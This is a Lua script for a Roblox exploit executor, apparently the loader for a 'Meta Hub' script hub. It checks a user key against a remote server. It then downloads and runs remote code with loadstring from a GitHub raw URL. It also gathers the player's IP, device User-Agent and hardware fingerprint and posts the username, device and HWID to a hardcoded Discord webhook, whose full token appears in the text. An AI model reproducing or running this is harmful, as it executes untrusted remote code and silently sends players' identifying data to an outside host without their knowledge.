
print(getgenv().key)
URI = "https://server-u214.onrender.com/" 

local URI_Data = game:HttpGet(URI..'?key='..getgenv().key)
if URI_Data and string.find(URI_Data, "invalid") then
	print("invalid")
  game:GetService('Players').LocalPlayer:Kick('invalid key')
return end

print('Whitelisted') 
loadstring(game:HttpGet("https://raw.githubusercontent.com/metauser08/lua/main/test"))()
local http_request = request;

local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
local decoded = game:GetService('HttpService'):JSONDecode(body)
local hwid = decoded.headers["Codex-Fingerprint"]
local ip = decoded.origin
local device = decoded.headers["User-Agent"]

print(body)
httpservice = game:GetService("HttpService")

local response = request({
	Url = "https://discord.com/api/webhooks/1241393145866878996/KBXb8wpgO78mz3TvU_bh5LO32gJuMzKXC1Xjlms-pbLPglurtDtgWKod8SIXdfWTb8Zm",
	Method = "POST",
	Headers = {
		["Content-Type"] = 'application/json'
	},
	Body = httpservice:JSONEncode({
		["content"] = "",
		["embeds"] = {{
			["title"] = "Data",
			["description"] = "**Username:** "..game.Players.LocalPlayer.DisplayName.. "\n **Device:** "..device.."\n **HWID:** "..hwid,
			["type"] = "rich",
			["color"] = tonumber(0xd9abd7),
			["footer"] = {
				["text"] = "Meta Hub",
			}
		}}
	})
})
